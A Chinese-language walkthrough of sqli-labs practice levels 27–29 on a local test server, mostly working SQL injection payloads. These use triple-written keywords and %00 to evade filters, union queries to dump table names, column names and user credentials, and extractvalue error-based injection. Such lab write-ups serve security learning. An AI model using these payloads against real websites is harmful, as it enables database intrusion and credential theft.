sqli-labs 27到30

第27题

发现对select和union都进行了顾虑

select双写也进行了过滤

但是三写没有过滤哈哈（颇有种赖皮的感觉）

刚学到一手可以用%00绕过注释符过滤。

?id='uunionnion(sseselectlectelect(1),(database()),(1));%00

http://localhost/sqli-labs-php7-master/Less-27?id='uunionnion(sseselectlectelect(1),group_concat((table_name)),(1)from(information_schema.tables)where(table_schema='security'));%00

id='uunionnion(sseselectlectelect(1),group_concat((column_name)),(1)from(information_schema.columns)where(table_schema='security'%26%26table_name='users'));%00

爆用户名密码

http://localhost/sqli-labs-php7-master/Less-27?id='uunionnion(sseselectlectelect(1),group_concat(username),(1)from(users));%00

第28题

可以看到这道题没有报错信息了，因此不能使用报错注入

判断闭合方式：

发现’时出现异常，因此闭合方式中肯定有‘

判断闭合方式中是否有):
?id=2'&&'1'='1 如果返回的是id=2的值那么为'闭合否则为'）闭合。

因此为')闭合。

或者使用%00作为注释试哪个正确

爆库名

爆列名：

id=')union(select(1),group_concat(table_name),(2)from(information_schema.tables)where(table_schema='security'));%00

其余同理。

第29题

判断闭合方式：

为'闭合。

因为是有报错信息的，所以直接使用报错注入

?id=2'||extractvalue(1,concat(0x7e,database()));%00

这。。。不知道是不是我低估了，这真的是29关吗

?id=2'||extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))));%00

爆列名

?id=2'||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema='security'and(table_name='users')))));%00